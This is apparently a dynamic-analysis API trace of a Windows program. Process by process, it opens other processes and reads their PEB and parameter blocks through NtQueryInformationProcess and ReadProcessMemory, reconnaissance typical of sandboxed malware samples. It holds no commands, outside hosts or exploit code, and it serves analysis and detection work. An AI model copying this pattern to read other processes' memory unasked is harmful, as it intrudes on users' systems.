[0414.187] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b2740, lpBuffer=0x2c0720, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0720*, lpNumberOfBytesRead=0x0) returned 1
[0414.187] free (_Block=0x2c0720)
[0414.188] CloseHandle (hObject=0x24c) returned 1
[0414.189] _ui64tow (_Value=0xaa8, _Buffer="2392", _Radix=10) returned="2728"
[0414.194] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2728") returned 4
[0414.195] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.195] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.218] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaa8) returned 0x24c
[0414.219] GetLastError () returned 0x0
[0414.219] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.219] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.219] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.219] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x192900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.219] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1926e4, lpBuffer=0x12dd100, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.221] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.226] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.226] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.227] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x191ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.228] malloc (_Size=0x6a) returned 0x2c1680
[0414.228] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x192746, lpBuffer=0x2c1680, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0414.229] free (_Block=0x2c1680)
[0414.229] CloseHandle (hObject=0x24c) returned 1
[0414.230] _ui64tow (_Value=0xab4, _Buffer="2728", _Radix=10) returned="2740"
[0414.234] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2740") returned 4
[0414.236] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.236] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.262] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xab4) returned 0x24c
[0414.262] GetLastError () returned 0x0
[0414.262] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.262] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.263] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.263] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5728f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.263] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5726e4, lpBuffer=0x12dd100, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.264] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.265] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.265] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.265] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x571ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.266] malloc (_Size=0x64) returned 0x2c0720
[0414.266] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x572740, lpBuffer=0x2c0720, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0720*, lpNumberOfBytesRead=0x0) returned 1
[0414.266] free (_Block=0x2c0720)
[0414.267] CloseHandle (hObject=0x24c) returned 1
[0414.268] _ui64tow (_Value=0xabc, _Buffer="2740", _Radix=10) returned="2748"
[0414.283] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2748") returned 4
[0414.284] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.284] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.307] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xabc) returned 0x24c
[0414.307] GetLastError () returned 0x0
[0414.307] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.307] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.307] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.307] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4128c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.307] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4126da, lpBuffer=0x12dd100, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.309] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.310] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.310] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.310] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x411ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.310] malloc (_Size=0x5a) returned 0x2c0720
[0414.310] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x41272c, lpBuffer=0x2c0720, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0720*, lpNumberOfBytesRead=0x0) returned 1
[0414.311] free (_Block=0x2c0720)
[0414.311] CloseHandle (hObject=0x24c) returned 1
[0414.312] _ui64tow (_Value=0xac4, _Buffer="2748", _Radix=10) returned="2756"
[0414.318] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2756") returned 4
[0414.319] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.319] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.386] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xac4) returned 0x24c
[0414.386] GetLastError () returned 0x0
[0414.386] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.386] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.386] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.387] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x422920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.387] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4226f4, lpBuffer=0x12dd100, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.388] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.389] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.389] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.389] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x421ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.390] malloc (_Size=0x70) returned 0x2c1680
[0414.390] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x42275c, lpBuffer=0x2c1680, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0414.390] free (_Block=0x2c1680)
[0414.391] CloseHandle (hObject=0x24c) returned 1
[0414.391] _ui64tow (_Value=0xacc, _Buffer="2756", _Radix=10) returned="2764"
[0414.397] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2764") returned 4
[0414.398] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.398] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.421] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xacc) returned 0x24c
[0414.421] GetLastError () returned 0x0
[0414.421] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.421] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.421] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.422] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb2920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.422] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb26e8, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.423] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.424] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.424] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.424] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.424] malloc (_Size=0x74) returned 0x2c1680
[0414.425] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb2754, lpBuffer=0x2c1680, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0414.425] free (_Block=0x2c1680)
[0414.425] CloseHandle (hObject=0x24c) returned 1
[0414.471] _ui64tow (_Value=0xad4, _Buffer="2764", _Radix=10) returned="2772"
[0414.476] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2772") returned 4
[0414.477] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.477] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.500] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad4) returned 0x24c
[0414.500] GetLastError () returned 0x0
[0414.500] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.500] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.501] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.501] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x252910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.501] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2526e4, lpBuffer=0x12dd100, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.502] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.503] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.503] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.503] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x251ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.552] malloc (_Size=0x6e) returned 0x2c1680
[0414.552] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x25274a, lpBuffer=0x2c1680, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0414.552] free (_Block=0x2c1680)
[0414.553] CloseHandle (hObject=0x24c) returned 1
[0414.554] _ui64tow (_Value=0xadc, _Buffer="2772", _Radix=10) returned="2780"
[0414.558] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2780") returned 4
[0414.560] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.560] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.600] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xadc) returned 0x24c
[0414.601] GetLastError () returned 0x0
[0414.601] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3528e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3526e0, lpBuffer=0x12dd100, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.602] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.604] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.604] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.604] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x351ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.604] malloc (_Size=0x5e) returned 0x2c0790
[0414.604] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x352736, lpBuffer=0x2c0790, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0414.604] free (_Block=0x2c0790)
[0414.605] CloseHandle (hObject=0x24c) returned 1
[0414.760] _ui64tow (_Value=0xab0, _Buffer="2780", _Radix=10) returned="2736"
[0414.764] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2736") returned 4
[0414.766] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x232, dwBuildNumber=0x0, dwPlatformId=0x128260, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.766] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.792] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xab0) returned 0x24c
[0414.792] GetLastError () returned 0x0
[0414.792] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.792] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.792] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.792] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.793] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b26fa, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.794] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.795] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.795] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.795] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.796] malloc (_Size=0x74) returned 0x2c1680
[0414.796] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b2766, lpBuffer=0x2c1680, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0414.796] free (_Block=0x2c1680)
[0414.797] CloseHandle (hObject=0x24c) returned 1
